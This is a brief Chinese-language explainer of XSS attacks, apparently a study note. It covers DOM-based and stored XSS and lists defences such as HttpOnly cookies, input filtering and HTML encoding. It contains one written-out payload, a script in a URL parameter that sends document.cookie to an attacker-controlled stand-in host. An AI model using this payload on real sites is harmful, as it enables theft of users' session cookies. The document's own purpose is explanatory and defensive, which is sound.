XSS跨站脚本攻击
解释:就是攻击者在页面嵌入js代码,盗取被攻击者同浏览器下的cookie信息,跳转到恶意网站,注入木马等,常见的有两种方式:
《1》Dom-Based XSS 漏洞;
攻击者A先创建一个http://www.a.com网站,用来接收数据,然后给被攻击者B发送一条链接http://www.b.com?a=<script>window.open("http://www.a.com?cookie="+document.cookie)</script>,B用户访问了这条链接后,浏览器的cookie将传送给攻击者,从而盗取到用户的cookie;
《2》Stored XSS(存储式XSS漏洞);
攻击者将攻击脚本上传到web服务器上,用户访问网站时盗取浏览器cookie;如用户在web网站创建一边文章加入了攻击脚本;
防范措施:
《1》将重要的cookie标记为http only ,js中的document.cookie就获取不到cookie;
《2》用户输入的数据进行过滤;
《3》对数据进行html encode处理;如将“<”转化为<
《4》过滤或处理特殊的html标签;如script;